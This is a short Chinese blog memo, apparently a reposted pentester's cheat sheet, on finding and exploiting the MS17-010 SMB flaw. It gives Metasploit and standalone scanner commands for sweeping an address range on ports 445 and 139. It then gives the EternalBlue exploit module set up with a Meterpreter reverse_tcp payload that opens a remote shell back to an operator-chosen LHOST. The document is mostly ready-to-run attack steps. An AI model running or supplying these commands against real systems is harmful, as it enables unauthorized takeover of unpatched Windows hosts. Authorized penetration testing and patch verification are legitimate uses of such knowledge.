zoukankan      html  css  js  c++  java
  • ms17010批量扫描备忘

    安装一些依赖:
    dpkg --add-architecture i386 && apt-get update && apt-get install wine32 
            rm -r ~/.wine 
            wine cmd.exe   
            exit
    漏洞扫描一:
    use auxiliary/scanner/smb/smb_ms17_010
    set rhosts 192.168.0.1-192.168.0.254
    set ShowProgress false
    set ConnectTimeout 5
    set threads 16
    services -r tcp -p 445 -R
    run
    
    扫139端口的话
    
    set SMBDirect false
    set RPORT 139
    
    或者
    
    unset SMBDirect
    set RPORT 139
    漏洞扫描二:
    
    $ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out
    
    指定目标主机列表(每行一个目标):
    
    $ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out
    
    该漏洞可以通过139/TCP利用,不限于445/TCP:
    
    $ MS17-010-Nessus.exe -q -m -b 192.168.0.1 -e 192.168.255.254 -o scan.out -p 139
    $ MS17-010-Nessus.exe -q -m -l hostlist -o scan.out -p 139
    
    如果不指定"-o scan.out",向stdout输出
    
    -q
    
        只显示vulnerable主机,否则将显示safe、unknown等其他主机
    
    -m
    
        实时显示当前扫描目标,可以不指定
    
    漏洞扫描三:
    http://www.freebuf.com/sectool/134657.html
    
    漏洞利用一:
    gem install ruby_smb
    use exploit/windows/smb/ms17_010_eternalblue
    set RHOST 192.168.0.160
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.0.86
    
    漏洞利用二:
    http://www.freebuf.com/articles/system/133853.html
    

      

    参考文章:

    http://www.freebuf.com/sectool/134657.html
    http://scz.617.cn/windows/201706221521.txt
    http://scz.617.cn/windows/201707031558.txt

  • 相关阅读:
    新建安卓项目后,manifest.xml中会出现大段的黄色警告
    TextView设置setCompoundDrawables不生效解决办法
    数据结构->队列->顺序循环队列ADT代码
    数据结构->栈->顺序栈ADT代码
    JAVA环境变量的配置
    计算机科学的范围-----18.12.08
    字符串复制
    扔鸡蛋问题和找零钱问题
    动态规划
    最小二乘法
  • 原文地址:https://www.cnblogs.com/whoami101/p/7151214.html
Copyright © 2011-2022 走看看